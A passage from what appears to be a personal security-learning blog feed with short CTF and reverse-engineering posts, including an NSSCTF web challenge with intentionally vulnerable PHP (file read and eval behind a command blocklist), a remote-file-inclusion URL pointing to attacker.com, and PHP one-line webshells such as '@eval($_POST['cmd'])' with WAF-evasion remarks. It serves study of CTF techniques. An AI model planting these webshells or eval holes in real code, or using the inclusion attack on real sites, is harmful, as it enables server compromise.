userDeposit.unlockTime);<br> }<br>}<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>web3</category>
</categories>
<tags>
<tag>course</tag>
</tags>
</entry>
<entry>
<title>NSSCTFweb2</title>
<link href="/2024/10/19/NSSCTFweb2/"/>
<url>/2024/10/19/NSSCTFweb2/</url>
<content type="html"><![CDATA[<p>The future</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'file'</span>];<br><span class="hljs-variable">$data</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable">$file</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">"File contents: <span class="hljs-subst">$data</span>"</span>;<br><span class="hljs-comment">//朴实无华,拿来就用 </span><br>File contents: <br></code></pre></td></tr></table></figure><p>一个简单的FIV文件包含漏洞<br>本地文件包含(LFI)<br>潜在的远程文件包含(RFI)漏洞<br>如果 PHP 配置中 allow_url_fopen 和 allow_url_include 设置为 On,攻击者甚至可以通过 file 参数引入远程文件,执行远程的恶意代码。假如配置不当,攻击者可以通过这样的 URL 进行远程文件包含:<br><a href="http://example.com/vulnerable.php?file=http://attacker.com/malicious_code.php">http://example.com/vulnerable.php?file=http://attacker.com/malicious_code.php</a></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'code'</span>])){<br> <span class="hljs-variable">$code</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'code'</span>];<br><span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">'/sys|pas|read|file|ls|cat|tac| |head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i'</span>,<span class="hljs-variable">$code</span>)){<br> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$code</span>); <br> <span class="hljs-keyword">echo</span> <span class="hljs-string">'<br>'</span>;<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">'<img src="./dududadadudu.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 20%; height: auto;">'</span>; <br> <span class="hljs-keyword">echo</span> <span class="hljs-string">'<audio controls>'</span>;<span class="hljs-keyword">echo</span> <span class="hljs-string">'<source src="./dududadudada.mp3" type="audio/mpeg">'</span>;<br> } <span class="hljs-keyword">else</span> {<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">'<img src="./redhot.jpg" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">'</span>; <br> <span class="hljs-keyword">die</span>(<span class="hljs-string">"这都不能bypass?不准你玩cod"</span>); }<br> } <span class="hljs-keyword">else</span> {<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"喜欢用轮椅枪是吧,账号给你ban了!"</span>;<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">'<img src="./ban.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">'</span>; <br>} <br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>按钮事件</title>
<link href="/2024/10/18/%E6%8C%89%E9%92%AE%E4%BA%8B%E4%BB%B6/"/>
<url>/2024/10/18/%E6%8C%89%E9%92%AE%E4%BA%8B%E4%BB%B6/</url>
<content type="html"><![CDATA[<p>在我们进行逆向时普遍会遇到出现弹窗,但是我们没有办法搜索到字符串完成定位点的问题,这个时候我们可以利用按钮时间来到达对应的输入断点<br><img src="https://gitee.com/fogpost/photo/raw/master/202410181444105.png" srcset="/img/loading.gif" lazyload><br>在我们这图中,在输入完数之后我们不点登录在od中查找二进制字符串,如下<br><img src="https://gitee.com/fogpost/photo/raw/master/202410181449498.png" srcset="/img/loading.gif" lazyload><br>之后我们会到达此处,此处的断点便是易语言的按钮事件断点<br><img src="https://gitee.com/fogpost/photo/raw/master/202410181450283.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>逆向</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>Hook</title>
<link href="/2024/10/16/Hook/"/>
<url>/2024/10/16/Hook/</url>
<content type="html"><![CDATA[<h1 id="Hook"><a href="#Hook" class="headerlink" title="Hook"></a>Hook</h1><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>Hook是一种技术,它允许一个程序监视和修改另一个程序的运行。Hook技术通常用于调试、修改程序行为、保护程序等目的。</p><p>在Windows操作系统中,Hook技术主要分为以下几种:键盘Hook、鼠标Hook、消息Hook、API Hook等。</p><h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>SetWindowsHookExA函数是Windows API中用于设置Hook的函数。它可以用于监视和修改其他程序的键盘、鼠标、消息等事件。</p><p>SetWindowsHookExA函数的原型如下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c">HHOOK <span class="hljs-title function_">SetWindowsHookExA</span><span class="hljs-params">(</span><br><span class="hljs-params"> <span class="hljs-type">int</span> idHook,</span><br><span class="hljs-params"> HOOKPROC lpfn,</span><br><span class="hljs-params"> HINSTANCE hmod,</span><br><span class="hljs-params"> DWORD dwThreadId</span><br><span class="hljs-params">)</span>;<br></code></pre></td></tr></table></figure><h3 id="键盘消息钩取练习"><a href="#键盘消息钩取练习" class="headerlink" title="键盘消息钩取练习"></a>键盘消息钩取练习</h3>]]></content>
<categories>
<category>逆向</category>
</categories>
<tags>
<tag>DLL</tag>
</tags>
</entry>
<entry>
<title>wuai第八课</title>
<link href="/2024/10/15/wuai%E7%AC%AC%E5%85%AB%E8%AF%BE/"/>
<url>/2024/10/15/wuai%E7%AC%AC%E5%85%AB%E8%AF%BE/</url>
<content type="html"><![CDATA[<h1 id="bss节区"><a href="#bss节区" class="headerlink" title=".bss节区"></a>.bss节区</h1><h2 id="bss节区简介"><a href="#bss节区简介" class="headerlink" title=".bss节区简介"></a>.bss节区简介</h2><p>bss节区是程序中未初始化的全局变量和静态变量所在的节区,它通常在程序开始执行前被初始化为0。bss节区的大小由程序中未初始化的全局变量和静态变量的数量和大小决定。</p><h2 id="bss节区的特点"><a href="#bss节区的特点" class="headerlink" title=".bss节区的特点"></a>.bss节区的特点</h2><p>可以用于反dump</p>]]></content>
<categories>
<category>课程</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>php一句话木马</title>
<link href="/2024/10/09/php%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/"/>
<url>/2024/10/09/php%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/</url>
<content type="html"><![CDATA[<p>了解一下php的include函数顺便了解一句话木马的各种形式</p><h2 id="include函数"><a href="#include函数" class="headerlink" title="include函数"></a>include函数</h2><p>在php中,include函数用于引入一个文件,如果引入的文件不存在,则会抛出一个警告,但程序会继续执行。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-keyword">include</span> <span class="hljs-string">'test.php'</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">'hello world'</span>;<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>如果test.php不存在,则会抛出一个警告,但程序会继续执行,输出hello world。<br>我们也可以在文件中定义动态的文件名</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta"><?php</span><br><span class="hljs-variable">$NSS</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">'NSS'</span>];<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$NSS</span>;<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-variable">$NSS</span>);<br><span class="hljs-keyword">include</span>(<span class="hljs-variable">$NSS</span>);<br><span class="hljs-meta">?></span> <br></code></pre></td></tr></table></figure><h2 id="木马举例"><a href="#木马举例" class="headerlink" title="木马举例"></a>木马举例</h2><blockquote><?php @eval($_POST['cmd']); ?><?php @eval($_POST[1]); ?><p>,简析一下这两马效果是一样的,但是数字与字符串的区别在于是否需要增加引号<br>一句话木马通常使用 POST 请求而不是 GET,因为 get传参有限制,在对某些waf进行垃圾数据填充时不方便,无法构造畸形的数据包</p></blockquote>]]></content>
<categories>
<category>网络</category>
</categories>
<tags>